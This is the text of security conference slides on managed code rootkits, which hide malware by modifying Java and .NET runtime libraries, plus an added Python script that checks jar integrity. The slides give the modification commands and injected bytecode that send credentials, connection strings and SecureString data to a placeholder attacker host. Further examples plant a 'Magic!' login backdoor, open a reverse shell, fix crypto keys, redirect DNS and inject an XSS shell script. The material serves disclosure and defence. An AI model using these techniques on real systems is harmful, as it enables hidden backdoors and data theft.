DEMO - println(string s) goes crazy

..or how to make code do more than it should 

Trivial question: 

What should be the output of the following (Java) code? 



class HelloWorld {
    public static void main(String args[]) {
        System.out.println("Hello World!");
    }
}

C:\WINDOWS\system32\cmd.exe

E:\Rootkits\Demo\println Twice>java HelloWorld
Hello World!
Hello World!

E:\Rootkits\Demo\println Twice>



That was a simple PoC of runtime language modification: "println()" was modified to print every string twice.

Background



I started playing with the idea of Managed Code language 
modification back in 2008 

Wrote a whitepaper titled " .NET Framework Rootkits - 
Backdoors inside your Framework" 

• Presented in BH EU 2009 & CanSecWest

• .NET Rootkits was a case study of the Managed Code Rootkit concept

Today we'll talk about the general concept and take a look 
at Java Rootkits as well 
What is managed code?

Code that executes under the management of an application virtual machine, a.k.a. "the sandbox"

• Think of it as an "applicative OS" for apps 

• Example: Java Virtual machine (JVM) 

• High level intermediate assembly language



• As opposed to unmanaged code (example: C/C++) which is 
executed directly by the CPU 

Write once, run everywhere 

• Managed code is independent of the underlying platform. 

• The VM acts as a machine specific "bridge" 

• Same code can run on Windows, Linux, Mac, Mainframe, 
mobile phone, database, car, toaster.. 
Managed code platform examples



Examples of application VM used in managed code 
platforms 

• Java Virtual Machine (JVM) 

• .NET Framework (CLR) 

• PHP (Zend Engine) 

• Flash Player / AIR - ActionScript Virtual Machine (AVM)

• Python

• Dalvik virtual machine (Google Android)

• SQLite virtual machine (VDBE)

• Perl virtual machine

• Etc...

Java & .NET were chosen as case studies 

• Execution model similar to each other and to other platforms 

• Used today by most new development projects 
(Diagram: the VM generates machine specific code for each platform)

Application level rootkits, hidden inside the managed code environment libraries

Their target - the managed code runtime (the VM) providing services 
to the upper level applications 

MCR influence is on the upper level application, controlling all apps 

• Traditional rootkits usually hide some information from the OS 

• Hiding their presence 

• Hiding files, processes, registry keys, ports, etc... 

• MCR can do the same, but by hiding from the applications 



• MCR can also cause sophisticated logical behavior modification 
MCR advantages



An ideal, overlooked place for malicious code hiding 

• No (current) AV / IPS understands intermediate language bytecodes 

• Same goes for forensics techniques 

• Developer backdoors are hidden from code review audits

Universal rootkit - rely on the VM's generation of machine specific code for different platforms

Large attack surface - VMs are installed/preinstalled on almost every machine

High success rate - one deployment can control all applications

Managed code becomes part of the OS (Example: .NET PowerShell cmdlets)

Sophisticated attacks enabler 



• Low level access to important methods 

• Timing 

• Object Oriented malware 
From language modification

(Diagram: User -> Application -> Runtime Class Libraries (Java, Microsoft .NET, Python) -> OS APIs and services; the application calls into the runtime class libraries, which sit between it and the OS)

static void Main(string[] args)
{
    //DO SOMETHING
    //EXAMPLE: call RuntimeMethod
    RuntimeMethod();
}

public void RuntimeMethod()
{
    //The implementation of RuntimeMethod()
    //Implementation code
    //...
}
Example Code 

The WriteLine(s) double printing PoC (.NET) 



Original code of WriteLine:

.method public hidebysig static void WriteLine(string 'value') cil managed
{
  .maxstack 8
  IL_0000: call class System.IO.TextWriter System.Console::get_Out()
  IL_0005: ldarg.0
  IL_0006: callvirt instance void System.IO.TextWriter::WriteLine(string)
  IL_000b: ret
} // end of method Console::WriteLine

Modified code:

.method public hidebysig static void WriteLine(string 'value') cil managed
{
  .maxstack 8
  IL_0000: call class System.IO.TextWriter System.Console::get_Out()
  IL_0005: ldarg.0
  IL_0006: callvirt instance void System.IO.TextWriter::WriteLine(string)
  // print #2 (duplicate)
  IL_000b: call class System.IO.TextWriter System.Console::get_Out()
  IL_0010: ldarg.0
  IL_0011: callvirt instance void System.IO.TextWriter::WriteLine(string)
  IL_001b: ret
} // end of method Console::WriteLine
Attack Scenarios



Messing with the sandbox usually requires admin privileges (ACL restriction) 

Scenario #1 - Attacker gains admin access to a machine by exploiting an 
unpatched vulnerability 

• Housekeeping attack vector 

• Alternative post exploitation attack vector for rooted machines 

Scenario #2 - The "trusted insider" threat - trusted employee who abuses his 
admin privileges on the attacked machine 

• Here we're talking about Developers, IT Admins, DBA's, etc. 

What's next? 

Attacker installs a MCR, capable of 

• Hide processes 

• Hide files 
• Hide network connections

• Install a backdoor for future access to the system 

• Manipulate sensitive application logic 
Implementation techniques

MCRs act as a part of the sandbox so they have access to low level, private methods

They can change the virtual machine's implementation

Non evasive ("by design")

• AOP - Aspect programming (dynamic weaving)

• Configuration modification

• Setting an alternative evil ClassLoader

• Loading a malicious agent "-javaagent:MyEvilAgent.jar" (Java)

• Library location tampering of "machine.config" (.NET)

Evasive

• Direct modification of the library intermediate bytecode

Using evasive techniques, the application cannot detect the presence of a rootkit. The modified sandbox "lies" to the application.
Java Rootkits

an example of evasive technique implementation

Overview of Java JVM modification steps

• Locate the class (usually in rt.jar) and extract it:

jar xf rt.jar java/io/PrintStream.class

• Disassemble it (using Jasper disassembler)

java -jar jasper.jar PrintStream.class

• Modify the bytecode

• Assemble it (using Jasmin assembler)

java -jar jasmin.jar PrintStream.j

• Deploy the modified class back to its location:

jar uf rt.jar java/io/PrintStream.class

For more information:

http://www.applicationsecurity.co.il/Java-Rootkits.aspx
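The procedure above ends with "jar uf" replacing one entry inside rt.jar in place, so the external tripwire the talk later asks IT to deploy comes down to comparing per-entry content digests against a baseline taken from a known-good install. The following Python is an added example, not code from the talk; it builds a constructed stand-in for rt.jar (placeholder bytes, not real class files), records a baseline, and reports which entries changed after a simulated class swap. Run such a check from outside the runtime being verified, since a Java-based check would itself execute on the possibly modified JVM.

```python
import hashlib
import io
import json
import zipfile


def build_jar(entries):
    """Build an in-memory jar (zip) from {entry name: bytes}. Used only to
    construct sample input here; a real check reads rt.jar from disk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def jar_digests(jar_bytes):
    """Map every file entry in the jar to the SHA-256 of its uncompressed
    content. Sizes and timestamps are ignored on purpose: a reassembled
    class can be about the same size, but its content hash still changes."""
    digests = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                digests[info.filename] = hashlib.sha256(zf.read(info)).hexdigest()
    return digests


def make_baseline(jar_bytes):
    """Serialize the digests of a known-good jar (taken from a clean install)."""
    return json.dumps(jar_digests(jar_bytes), sort_keys=True)


def check_runtime_jar(baseline_json, jar_bytes):
    """Compare a jar against the baseline; return modified/added/removed entries."""
    baseline = json.loads(baseline_json)
    current = jar_digests(jar_bytes)
    return {
        "modified": sorted(n for n in baseline if n in current and baseline[n] != current[n]),
        "added": sorted(n for n in current if n not in baseline),
        "removed": sorted(n for n in baseline if n not in current),
    }


# Constructed sample data: placeholder bytes stand in for real class files.
CLEAN_JAR = build_jar({
    "java/io/PrintStream.class": b"\xca\xfe\xba\xbe PrintStream, original",
    "java/lang/Object.class": b"\xca\xfe\xba\xbe Object, original",
})
# Simulates "jar uf rt.jar java/io/PrintStream.class" with a reassembled class.
TAMPERED_JAR = build_jar({
    "java/io/PrintStream.class": b"\xca\xfe\xba\xbe PrintStream, println twice",
    "java/lang/Object.class": b"\xca\xfe\xba\xbe Object, original",
})

if __name__ == "__main__":
    baseline = make_baseline(CLEAN_JAR)
    print(check_runtime_jar(baseline, CLEAN_JAR))     # nothing flagged
    print(check_runtime_jar(baseline, TAMPERED_JAR))  # PrintStream.class modified
```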
.NET Rootkits

an example of evasive technique implementation

Overview of .NET Framework modification steps

• Locate the DLL in the GAC, and disassemble it

ILDASM mscorlib.dll /OUT=mscorlib.dll.il /NOBAR /LINENUM /SOURCE

• Modify the MSIL code, and reassemble it

ILASM /DEBUG /DLL /QUIET /OUTPUT=mscorlib.dll mscorlib.dll.il

• Force the Framework to use the modified DLL

• Avoiding NGEN cached Native DLL

ngen uninstall mscorlib

• Remove traces with NGEN

More info can be obtained at the ".NET Rootkits" whitepaper ( http://www.applicationsecurity.co.il/.NET-Framework-Rootkits.aspx ) and the BlackHat Europe slides
Add "malware API" to classes

the building blocks

A.K.A. Method injection

Extend the runtime environment with general purpose "malware API" implemented as new methods

• Used by payload code - Deploy once, use many times

• Parameter passing

Some examples

• private void SendToUrl(string url, string data)

• private void ReverseShell(string ip, int port)

• private void HideFile(string fileName)

• private boolean InjectClass(Class maliciousClass)

• private Socket MitM(string victimURL, int port, string attackerURL)

• public void KeyLogEventHandler(Event e)

Will be used later on
Attacking the "Object" class



Object Oriented and inheritance play their role 

All classes automatically extend the class "Object" 

• They inherit its member variables & methods 

Object contains generic code that is shared among all the other 
objects 

Injecting a new method to "Object" class will influence ALL 
existing classes 

• Example: report current object variables to attacker

private void SendVariables(string attackerAddress) 
Malware development scenarios

Changing a language's class libraries can lead to some very interesting attacks

• Code manipulation, API Hooking 

• Authentication Backdoors 

• Sensitive data theft 

• Resource hiding (file, process, port...) 

• Covert Channels / reverse shells 

• Proxy (bouncer), DNS fixation, MitM.. 

• Polymorphism attacks 

• Disabling security mechanisms 

Remember, we are hiding it from apps running inside the 
sandbox, not from the OS 

We are messing with the sandbox 
Let's talk about some examples... 
Stealing from inside of Authenticate() - used by all applications

Send the credentials to the attacker url

• We can use our SendToUrl() to send the info to the attacker

Original code / post injection: FormsAuthentication::Authenticate

Modified code (post injection):

  IL_0033: ldloc.0
  /////appended code - call SendToUrl
  IL_0034: ldstr "http://www.attacker.com/CookieStealer/WebForm1.aspx?s="
  IL_0039: ldarg.0
  IL_003a: ldstr ":"
  IL_003f: ldarg.1
  IL_0040: call string [mscorlib]System.String::Concat(string, string, string)
  IL_0045: call void System.Web.Security.FormsAuthentication::SendToUrl(string, string)
  /////end appended code - call SendToUrl
  IL_004a: ret
} // end of method FormsAuthentication::Authenticate
DEMO

Hooking into "FormsAuthentication::Authenticate()" (.NET)

Stealing authentication credentials from login pages

http://www.RichBank.com/formsauthentication/Login.aspx

(Diagram: users A to C send Username+Password to the www.RichBank.com (victim) login page; the hooked Runtime VM forwards them to www.attacker.com)

Login page:

protected void btnLogin_Click(object sender, EventArgs e)
{
    if (FormsAuthentication.Authenticate(user, password))
    ...

Runtime VM:

bool Authenticate(string name, string password)
{
    //original code...
    SendToUrl("www.attacker.com", name+password);
}
Authentication backdoors 



Another attack on Authenticate() method - authentication backdoors

Conditional authentication bypass

• Example - "MagicValue" (Decompiled):

Injected code:

  IL_0000: ldarg.1
  IL_0001: ldstr "Magic!"
  IL_0006: callvirt instance bool [mscorlib]System.String::Equals(string)
  IL_000b: brfalse.s IL_0015
  IL_000d: ldc.i4.1
  IL_000e: stloc.0
  IL_000f: br.s IL_0020
  IL_0011: ldc.i4.0
  IL_0012: stloc.0
  IL_0013: br.s IL_0035
  IL_0015: ret

Original code starts here (the unmodified method's FORMS_AUTH_SUCCESS / FORMS_AUTH_F... event code)
Reverse Shell

Encoded version of netcat (MSIL array, drop and pop)

Deployed as public method + private class

Example - trigger - connect on Application::Run()

Original code (pre injection):

.method public hidebysig static void Run(class System.Windows.Forms.Form mainForm) cil managed
{
  // Code size 18 (0x12)
  .maxstack 8
  IL_0000: call class System.Windows.Forms.Application/ThreadContext System.Windows.Forms.Application/ThreadContext::FromCurrent()
  IL_0005: ldc.i4.m1
  IL_0006: ldarg.0
  IL_0007: newobj instance void System.Windows.Forms.ApplicationContext::.ctor(class System.Windows.Forms.Form)
  IL_000c: callvirt instance void System.Windows.Forms.Application/ThreadContext::RunMessageLoop(int32, class System.Windows.Forms.ApplicationContext)
  IL_0011: ret
} // end of method Application::Run

Modified code (post injection):

.method public hidebysig static void Run(class System.Windows.Forms.Form mainForm) cil managed
{
  .maxstack 8
  //added code - call reverse shell
  IL_0000: ldstr ".50.129"   //attacker machine
  IL_0005: ldc.i4 0x4d2      //port 1234
  IL_0006: call void System.Windows.Forms.Application::ReverseShell(string, int32)
  ////end added code - call reverse shell
  IL_000b: call class System.Windows.Forms.Application/ThreadContext System.Windows.Forms.Application/ThreadContext::FromCurrent()
  IL_0010: ldc.i4.m1
  IL_0011: ldarg.0
  IL_0012: newobj instance void System.Windows.Forms.ApplicationContext::.ctor(class System.Windows.Forms.Form)
  IL_0017: callvirt instance void System.Windows.Forms.Application/ThreadContext::RunMessageLoop(int32, class System.Windows.Forms.ApplicationContext)
  IL_001c: ret
} // end of method Application::Run
Crypto attacks

Tampering with Cryptography libraries

• False sense of security

Some scenarios:

• Key fixation and manipulation

• Key stealing (example - SendToUrl(attacker, key))

• Algorithm downgrading (AES -> DES, etc..)

Example - GenerateKey() key fixation (modified code):

public override void GenerateKey()
{
    base.keyValue = System.Text.ASCIIEncoding.ASCII.GetBytes("FIXED_KEY");
}

Black Hat Briefings
DNS manipulation 



Manipulating DNS queries / responses

Example (Man-In-The-Middle)

• Fixate the runtime DNS resolver to return a specific IP address, controlled by the attacker

• All communication will be directed to attacker

Affects ALL network API methods

Example: resolve victim -> attacker

Injected code:

  aload_0                                                    ; load s into stack
  ldc "www.ForexQuoteServer.com"
  invokevirtual java/lang/String/equals(Ljava/lang/Object;)Z ; compare the 2 strings
  ifeq LABEL_compare
  ldc "www.attacker.com"
  astore_0                                                   ; store attacker hostname to stack
LABEL_compare:

Equivalent, inside InetAddress.getByName(String s):

  if (s.equals("www.ForexQuoteServer.com"))
      s = "www.attacker.com";
  return getAllByName(s)[0];
DEMO

"InetAddress::getByName()" conditional IP fixation (JAVA/Linux)

Modified classes are platform independent

We will deploy the same class used on Win on a linux machine

(Diagram: Victim Machine (BT4 Linux) resolving www.ForexQuoteServer.com (local Forex Server) is redirected to the MitM "Forex" server at www.attacker.com)
Stealing connection strings

SqlConnection::Open() is responsible for opening DB connection

• "ConnectionString" variable contains the data

• Open() is called, ConnectionString is initialized

Send the connection string to the attacker

public override void Open()
{
    SendToUrl("www.attacker.com", this.ConnectionString);
    //original code starts here
    ...
}
Permanent HTML/JS injection

Tamper with hard-coded HTML/Javascript templates

Inject permanent code into code templates

• Permanent XSS

• Proxies / Man-in-the-Middle

• Defacement

• Browser exploitation frameworks

• Example - injecting a permanent call to XSS shell

<script src="http://www.attc.../xssshell.asp?v=123"></script>
Peek into SecureString data

In-memory encrypted string for sensitive data usage (.NET)

• It probably contains valuable data!

Example - extract the data and send it to the attacker (decompiled):

IntPtr ptr = System.Runtime.InteropServices.Marshal.SecureStringToBSTR(secureString);
SendToUrl("www.attacker.com",
    System.Runtime.InteropServices.Marshal.PtrToStringBSTR(ptr));
Disabling security mechanisms

Java JAAS (Java Authentication & Authorization Service) / .NET CAS (Code Access Security) are responsible for runtime code authorizations

grant CodeBase "http://www.example.com",
    Principal com.sun.security.auth.SolarisPrincipal "duke" {
    permission java.io.FilePermission "/home/duke", "read,write";
};

Security logic manipulation

• Example - messing with Demand()

• CodeAccessPermission.FileIOPermission, RegistryPermission, Principal..

Effect - Applications will not behave according to declared settings

• False sense of security (code seems to be restricted!!)

• Configuration audit is useless
Advanced topics



Cross platform modified class can run on different platforms 

"One class to rule them all, One class to find them, One class to 
bring them all and in the darkness bind them" 

What about other Runtimes? 

ESB? Web Service stacks? Application Servers? Databases? 
SilverLight? PowerShell? 

Their behavior can be changed 

Multiple, chained rootkits / second order rootkits 

1. OS level rootkit covering up the traces of MCR (file size, signature..)

2. VM level MCR covering its traces from the application 
General purpose .NET DLL modification tool
Able to perform all previous steps 

• Extract target DLL from the GAC 

• Perform complicated code modifications 

• Generate GAC deployers 

Easy to extend by adding new code modules 

Most of the discussed attacks have a .NET-Sploit PoC 
module implementation 
.NET-Sploit module concept

Generic modules concept 

• Function - a new method 

• Payload - injected code 

• Reference - external DLL reference 

• Item - injection descriptor 
Comes with a set of predefined modules 
Item example

<!-- Target -->
<CodeChangeItem name="print twice">
  <Description>change WriteLine() to print every string twice</Description>
  <!-- Location -->
  <AssemblyLocation> c:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089 </AssemblyLocation>
  <!-- Injected Code (payload/func) -->
  <AssemblyCode>
    <FileName> writeline twice.payload </FileName>
    <!-- Hooking point -->
    <Location>
    </Location>
    <StackSize> 8 </StackSize>
  </AssemblyCode>
</CodeChangeItem>

DEMO - .NET-Sploit

Targeted reverse shell (.NET)

Open a reverse shell to the attacker's machine when a specific 
application ("SensitiveApplication.exe") is executed 

.NET-Sploit will inject the following code: 

• General purpose ReverseShell() method 

• Loader code - into the Framework "Run()" method 





(Diagram: victim's firewall - Incoming: BLOCKED, Outgoing: ALLOWED)
Call for action

AV/HIPS vendors - Block Runtime tampering attempts 

IT - File tampering detectors (external tripwire) 

Auditors/testers - know about this malware hiding place 

Forensics - look for evidence inside the runtime VM 

Developers - your app is as secure as the underlying runtime VM

VM Vendors -Although it's not a bulletproof solution - 
Raise the bar. It's too low! 

End users -verify your Runtime libraries! 
Summary



Malicious code can be hidden inside an application runtime VM 

It is an alternative place for malware deployment besides the 
Kernel, BIOS, Drivers, etc.. 

• It is an alternative place for backdoors 

Can lead to some very interesting attacks 

It does not depend on specific vulnerability 

It is not restricted only to Java or .NET 

.NET-Sploit, a generic language modification tool, simplifies the 
process for .NET but can be extended to other platforms 